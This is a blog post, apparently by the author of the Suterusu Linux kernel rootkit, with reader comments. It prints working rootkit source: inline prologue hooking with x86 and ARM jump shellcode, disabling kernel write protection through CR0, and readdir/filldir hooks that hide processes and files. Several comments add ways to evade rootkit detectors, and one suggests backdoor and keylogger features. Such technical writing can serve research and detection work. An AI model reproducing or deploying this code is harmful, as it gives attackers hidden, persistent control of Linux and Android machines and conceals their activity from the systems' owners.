Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM

Table of Contents

Introduction

A number of months ago, I added a new project to the redmine tracker github showcasing some code I worked on over the summer (https://github.com/mncoppola/suterusu).

Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick.  I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits.  The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx.  A lot changes in the kernel from year to year, and I was hoping for something a little more recent.

So, like most of my projects, I said “screw it” and opened vim.  I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself.  I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM.

There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics.  Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors.  Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine.  This can be observed by examining the following four functions:

  • hijack_start()
  • hijack_pause()
  • hijack_resume()
  • hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

struct sym_hook {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct list_head list;
};

LIST_HEAD(hooked_syms);

To fully understand the hooking process, let’s step through some code.

Function Hooking on x86

Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];
    unsigned long o_cr0;

    // push $addr; ret
    memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);
    *(unsigned long *)&n_code[1] = (unsigned long)new;

    memcpy(o_code, target, HIJACK_SIZE);

    o_cr0 = disable_wp();
    memcpy(target, n_code, HIJACK_SIZE);
    restore_wp(o_cr0);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

A small-sized shellcode buffer is initialized with a “push dword 0; ret” sequence, of which the pushed value is patched with the pointer of the hook-with function.  HIJACK_SIZE number of bytes (equivalent to the size of the shellcode) are copied from the target function and the prologue is then overwritten with the patched shellcode.  At this point, all function calls to the target function will redirect to our hook-with function.

The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation.  The remaining hijack functions operate on this linked list.

hijack_pause() uninstalls the desired hook temporarily:

void hijack_pause ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_resume() reinstalls the hook:

void hijack_resume ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->n_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_stop() uninstalls the hook and deletes it from the linked list:

void hijack_stop ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);

            list_del(&sa->list);
            kfree(sa);
            break;
        }
}

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops.  This protection may be trivially circumvented however by setting the WP bit in the cr0 register to 0, disabling write protection on the CPU. Wikipedia’s article on control registers confirms this property:

BIT NAME FULL NAME DESCRIPTION
16 WP Write protect Determines whether the CPU can write to pages marked read-only

The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations.  The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

inline unsigned long disable_wp ( void )
{
    unsigned long cr0;

    preempt_disable();
    barrier();

    cr0 = read_cr0();
    write_cr0(cr0 & ~X86_CR0_WP);
    return cr0;
}

inline void restore_wp ( unsigned long cr0 )
{
    write_cr0(cr0);

    barrier();
    preempt_enable_no_resched();
}

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM.  For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture.  While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development.

Modified to address these new architectural characteristics is a version of hijack_start() specific to ARM:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];

    if ( (unsigned long)target % 4 == 0 )
    {
        // ldr pc, [pc, #0]; .long addr; .long addr
        memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[4] = (unsigned long)new;
        *(unsigned long *)&n_code[8] = (unsigned long)new;
    }
    else // Thumb
    {
        // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr
        memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[8] = (unsigned long)new;
        target--;
    }

    memcpy(o_code, target, HIJACK_SIZE);

    memcpy(target, n_code, HIJACK_SIZE);
    cacheflush(target, HIJACK_SIZE);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forego any potential voodoo magic to write to protected memory regions.  It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook.

ARM CPUs utilize a data cache and instruction cache for performance benefits.  However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory.  According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code.  The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

void cacheflush ( void *begin, unsigned long size )
{
    flush_icache_range((unsigned long)begin, (unsigned long)begin + size);
}

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors.  It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages.  A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal/no modification.  While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe.  By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called.  Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine.  However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion.  Moreso an issue of poor implementation than any insurmountable design flaw, there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion.  Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified.

Hiding Processes, Files, and Directories

Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique.

In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For explicatory purposes, we will examine the instantiation of the file_operations struct on ext3 for directory objects:

const struct file_operations ext3_dir_operations = {
    .llseek     = generic_file_llseek,
    .read       = generic_read_dir,
    .readdir    = ext3_readdir,
    .unlocked_ioctl = ext3_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl   = ext3_compat_ioctl,
#endif
    .fsync      = ext3_sync_file,
    .release    = ext3_release_dir,
};

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output.  To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct:

void *get_vfs_readdir ( const char *path )
{
    void *ret;
    struct file *filep;

    if ( (filep = filp_open(path, O_RDONLY, 0)) == NULL )
        return NULL;

    ret = filep->f_op->readdir;

    filp_close(filep, 0);

    return ret;
}

The actual hook process (for hiding items in /proc) looks like:

#if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30)
proc_readdir = get_vfs_readdir("/proc");
#endif
hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.

To perform the actual hiding of an objects in /proc, Suterusu hooks proc_readdir() with the following routine:

static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type);

int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir )
{
    int ret;

    o_proc_filldir = filldir;

    hijack_pause(proc_readdir);
    ret = proc_readdir(file, dirent, &n_proc_filldir);
    hijack_resume(proc_readdir);

    return ret;
}

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory.  This is replaced with a malicious n_proc_filldir() function, as follows:

static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_proc *hp;
    char *endp;
    long pid;

    pid = simple_strtol(name, &endp, 10);

    list_for_each_entry ( hp, &hidden_procs, list )
        if ( pid == hp->pid )
            return 0;

    return o_proc_filldir(__buf, name, namelen, offset, ino, d_type);
}

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide.  If a match is found, the callback returns 0 and the item is hidden from the directory listing.  Otherwise, the original proc_filldir() function is executed and its value returned.

This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first:

static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_file *hf;

    list_for_each_entry ( hf, &hidden_files, list )
        if ( ! strcmp(name, hf->name) )
            return 0;

    return o_root_filldir(__buf, name, namelen, offset, ino, d_type);
}

22 responses to “Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM”

  1. Have you read the Ksplice paper at http://www.ksplice.com/doc/ksplice.pdf ? They use a similar technique of overwriting the function prologue with a jump. For thread safety, they scan the kernel stack of every process, inside stop_machine(), and abort if one of the to-be-patched functions is active.

    They also have a clever technique for patching non-exported (i.e. static) functions and data. A patch ships with a copy of the old code that should already be running, in a format with relocation records still present. The process of applying an update matches this up with the running code in memory, and reverses the work that was performed by the kernel’s dynamic linker in applying those relocations. This gives you the addresses of some static functions, which in turn can be matched, and the fixed point gives you addresses of nearly every function in the kernel.

    (The matching process also means that Ksplice is great at detecting rootkits that have already scribbled over kernel code.)

    Anyway, read the paper if you haven’t already, it’s really cool stuff and would make a good basis for a sophisticated rootkit.

    1. Thanks for the pointer, I haven’t read the Ksplice paper yet but definitely will now. Sounds like there’s a lot of interesting stuff to draw inspiration from; hopefully I can implement some of the ideas in an upcoming commit.

  2. Did you consider using kernel probes? This debug subsystem is active by default on most linux distributions (debian, redhat, etc) and also on android devices! Take a look at my article http://www.libcrack.so/2012/09/02/bypassing-devmem_is_allowed-with-kprobes/
    The good point is you dont need to worry about the hardware arch, the bad point is that you need to apply kung-foo to hide the module from the modules linked list.

    Cheers!

    Borja.

    1. I actually have considered it, but unfortunately it seems that Android isn’t compiled with Kprobes support by default (which opposes what your blog post says ;) ). I’ll show you:

      Android kernels are certainly compiled with CONFIG_HAVE_KPROBES, however a quick grep of a source tree shows very few instances of this flag, none of which are #ifdef’s:

      $ grep CONFIG_HAVE_KPROBES -r .
      ./include/config/auto.conf:CONFIG_HAVE_KPROBES=y
      ./include/generated/autoconf.h:#define CONFIG_HAVE_KPROBES 1
      ./.config:CONFIG_HAVE_KPROBES=y
      ./.config.old:CONFIG_HAVE_KPROBES=y
      ./arch/um/defconfig:# CONFIG_HAVE_KPROBES is not set
      ./arch/arm/configs/android_4430_defconfig:CONFIG_HAVE_KPROBES=y

      I’m actually not even sure what function this flag serves, and documentation seems to have no explanation for it.

      However, if you take a look at the tree’s .config file, there is actually a second flag CONFIG_KPROBES that is not set. This is the flag that actually enables support for Kprobes:

      $ grep CONFIG_KPROBES -r .
      ./drivers/misc/lkdtm.c:#ifdef CONFIG_KPROBES
      ./include/linux/kprobes.h:#ifdef CONFIG_KPROBES
      ./include/linux/kprobes.h:#else /* CONFIG_KPROBES */
      ./include/linux/kprobes.h:#endif /* CONFIG_KPROBES */
      ./include/linux/kprobes.h:#ifdef CONFIG_KPROBES
      ./include/linux/kprobes.h:#ifdef CONFIG_KPROBES_SANITY_TEST
      ./include/linux/kprobes.h:#endif /* CONFIG_KPROBES_SANITY_TEST */
      ./include/linux/kprobes.h:#else /* !CONFIG_KPROBES: */
      ./include/linux/kprobes.h:#endif /* CONFIG_KPROBES */
      ./.config:# CONFIG_KPROBES is not set
      ./kernel/Makefile:obj-$(CONFIG_KPROBES_SANITY_TEST) += test_kprobes.o
      ./kernel/Makefile:obj-$(CONFIG_KPROBES) += kprobes.o
      ... (another 60 lines or so)

  3. Hi,

    This rootkit looks interesting and I like your design ideas including support for both
    2.6.x and 3.x kernels and nice socket hiding features.

    A few feature ideas: (if you like them).
    -Autostart on boot
    -Remote shell backdoor (with encryption and TTY/PTY support)
    -Keylogger/TTY Sniffer logs sniffed data to hidden logfile
    -Option to hide network interface’s promiscious mode
    -Install script

    1. I’ll consider it, thanks.

  4. […]         这里有几种Hook的方法。在Michael Coppola最近的文章中,谈论了《Inline Kernel Function Hooking》。对于我来说,这篇文章是很经典的Hook系统调用。下图是一个很典型的Hook系统调用。 […]

  5. There might be a more severe thread safety problem: during hijack_pause() and hijack_resume() some other function might try to execute hooked function in the middle of memcpy() which could result in panic (e.g. we copied only 6 bytes out of 12 and exactly at that moment someone calls our hooked function). For some reason it doesn’t happen on Linux, but I tried similar approach on OS X and got regular panics. Any ideas why?

    1. I’m not sure the reason why the race is only producible on OS X, but it sounds like the result of some really unlucky scheduling or SMP execution. I’m hoping to fix this soon and am currently looking into different options. Suggestions are welcome.

      1. Trampolines as described here http://jbremer.org/x86-api-hooking-demystified/#ah-trampoline should fix this race. Basically it could be like this: 1) Permanently overwrite prologue of hooked function with jump to hijack function. 2) Inside hijack function call trampoline, which first has to execute overwritten original bytes and then jump to the original hooked function right after those bytes. I’m no good at assembly, but the problem here is that overwritten memory must *not* end in the middle of instruction and instruction length at the prologue might depend on the hooked function. This is in turn solvable by integrating disassembler into the rootkit (I’ve seen dtrace used that way) or hand-picking target function. Please take it with a grain of salt, I’m not sure myself that what I’m saying is technically correct.
        Also, one of the reasons there’s no race condition on Linux (at least not yet) is that hooked functions might be already protected by mutex of some sort.

  6. […] 要 hijack kernel function 似乎要牽涉到一些 shellcode… 而且是 platform-specific ,還有待研究。(順帶一看) […]

  7. You’re still theoretically unsafe on x86 on SMP, because only one-byte changes are safe from prefetching. Changes that involve more than a single byte require (as INTEL states for self-modifying code) that you stop CPUs, do the change, restart. Granted, in the very vast majority of cases you don’t need this, most likely because nobody is executing the target code ;-)

    Also, I would limit as much as possible .text hijacking. It’s somehow common practice today to check the integrity of the .text segment. Adore was using file/network operations extensively, so people started to check them as well. One step further, you can take the file/network operation pointer that is associated to any object in the kernel (e.g. a dentry) and go down changing -that- pointer, rather than the global file operation struct. You can do this for your hidden directory and similar. I’m not sure why this is not in any public rootkit I know of – it’s fairly straightforward code (it might have other drawbacks, e.g. someone knowing that you use it, might start looping through all the allocated dentry or file entry looking for a mismatching pointer and would immediately locate your hidden code… but that’s true in general for any rootkit, once you know what you’re looking for). The pro of function pointer interposition is that you don’t need to stop CPUs or mess with the .text :-)

    Also, if you need a continuously running task, rather than spawning a kthread and then having to hide it, you may consider using position-independent code (a blob) and register a timer that continuously relocates it and executes. A long time ago sgrakkyu wrote a paper about that called “Dynamic Kernel Infection”, was in Italian and perhaps translated in BFi. I don’t seem to be able to reach it right now, though. But the main idea is the one described above, this is just to give credit :-)

  8. Although probably not directly relevant to your Linux rootkit investigations, one point of interest regarding the Windows system libraries and kernel is that every function has a single-cycle two byte NOP at the start of its prologue that allows hijacking (or “hot-patching”) without the race condition: http://blogs.msdn.com/b/oldnewthing/archive/2011/09/21/10214405.aspx

  9. […] of the project says “An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM”. Another article related to Suterusu was published in January […]

  10. […] проекта гласит: «LKM руткит для Linux 2.6/3.x на x86(_64) и ARM». В другой статье, связанной с Suterusu, был опубликован в январе 2013 […]

  11. […] 我们从木马的名称来猜测,极有可能木马的作者是受到开源项目Suterusu(https://github.com/mncoppola/suterusu)的启发,而且还借鉴了部分该项目的代码(进程注入部分)。该项目的描述是这么说的:针对于 Linux 2.6/3.x on x86(_64), and ARM平台的LKM rootkit。关于该项目的的分析可以戳这里:https://poppopret.org/2013/01/07/suterusu-rootkit-inline-kernel-function-hooking-on-x86-and-arm/ […]

  12. […] проекта гласит: «LKM руткит для Linux 2.6/3.x на x86(_64) и ARM». В другой статье, связанной с Suterusu, был опубликован в январе 2013 […]

  13. […] Suterusu Rootkit: Inline Kernel Function Hooking on x86 andARM […]